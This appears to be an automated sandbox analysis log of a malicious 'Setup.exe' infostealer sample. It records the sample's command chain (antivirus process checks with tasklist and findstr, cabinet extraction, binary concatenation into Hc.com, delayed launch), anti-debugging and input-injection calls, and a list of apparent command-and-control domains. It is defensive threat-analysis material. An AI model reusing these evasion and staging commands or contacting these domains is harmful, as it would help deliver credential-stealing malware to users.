      Source: Setup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\user\Desktop\Setup.exe
      Source: unknown Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
      Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Agrees
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com I
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: acgenral.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmm.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: samcli.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: msacm32.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: mpr.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: edputil.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: appresolver.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: bcp47langs.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: slc.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: sppc.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\Desktop\Setup.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: wsock32.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: napinsp.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: pnrpnsp.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: wshbth.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: nlaapi.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: winrnr.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: rasadhlp.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: webio.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: winnsi.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: fwpuclnt.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: schannel.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: mskeyprotect.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ncryptsslp.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: msasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: gpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: dpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: Setup.exe Static file information: File size 73409696 > 1048576
      Source: Setup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_006702D8 push cs; retn 0066h 12_2_00670318
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00640DE6 push ecx; ret 12_2_00640DF9
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0063DC7C push AA0067CFh; iretd 12_2_0063DC87

      Persistence and Installation Behavior

      Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\280366\Hc.com
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_006B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 12_2_006B26DD
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0063FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 12_2_0063FC7C
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com API coverage: 3.9 %
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com TID: 6396 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
      Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0068DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_0068DC54
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0069A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0069A087
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0069A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0069A1E2
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0068E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 12_2_0068E472
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0069A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 12_2_0069A570
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0065C622 FindFirstFileExW, 12_2_0065C622
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_006966DC FindFirstFileW,FindNextFileW,FindClose, 12_2_006966DC
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00697333 FindFirstFileW,FindClose, 12_2_00697333
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_006973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 12_2_006973D4
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0068D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_0068D921
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00625FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00625FC8
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\280366
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\280366\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
      Source: Hc.com, 0000000C.00000002.2352426923.0000000001901000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: Hc.com, 0000000C.00000002.2352426923.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@L
      Source: Hc.com, 0000000C.00000002.2352426923.00000000018D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWF9B7082F5FCBF7C7AD725550C42B03151488B7A41E4476B996F1BC08E627004835A415B7F458AF9D724590BBCFA02FA0A1B4243675BA7B1F64AC3E5898BA32136D44DC516585EA954F8C8905C53C74CA096789965ED30B20B702D50830D1ABE15EFC3F826AB7C6945D7F4CB4C2D8BA5C494FF53377CCAA32F4F6CB5E7CD6434C1B66B6760CC8332583F8DFDA050F4364F7BF46747BAE908235D19255A41268D5E07743B36D4E29FD784ECC59B2DA16C0C57AC809EC826F9068C77DBF35C9B9CF784DB06980F611BCDE4C26F7F3E0E1D69BA88651
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Process information queried: ProcessInformation
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0069F4FF BlockInput, 12_2_0069F4FF
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0062338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 12_2_0062338B
      Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00645058 mov eax, dword ptr fs:[00000030h] 12_2_00645058
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_006820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 12_2_006820AA
      Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00652992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00652992
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00640BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00640BAF
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00640D45 SetUnhandledExceptionFilter, 12_2_00640D45
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00640F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00640F91

      HIPS / PFW / Operating System Protection Evasion

      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: bashfulacid.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tentabatte.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: curverpluch.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: talkynicer.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: shapestickyr.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: manyrestro.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: slipperyloo.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: wordyfindy.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: hungrypaster.click
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00681B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 12_2_00681B4D
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0062338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 12_2_0062338B
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0068BBED SendInput,keybd_event, 12_2_0068BBED
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0068EC6C mouse_event, 12_2_0068EC6C
      Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Agrees
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com I
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_006814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 12_2_006814AE
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00681FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 12_2_00681FB0
      Source: Hc.com, 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, Hc.com, 0000000C.00000003.2310520132.0000000004405000.00000004.00000800.00020000.00000000.sdmp, Developers.9.dr, Hc.com.2.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: Hc.com Binary or memory string: Shell_TrayWnd
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_00640A08 cpuid 12_2_00640A08
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0067E5F4 GetLocalTime, 12_2_0067E5F4
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0067E652 GetUserNameW, 12_2_0067E652
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 12_2_0065BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 12_2_0065BCD2
      Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      Source: Yara match File source: sslproxydump.pcap, type: PCAP
      Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
      Source: Hc.com Binary or memory string: WIN_81
      Source: Hc.com Binary or memory string: WIN_XP
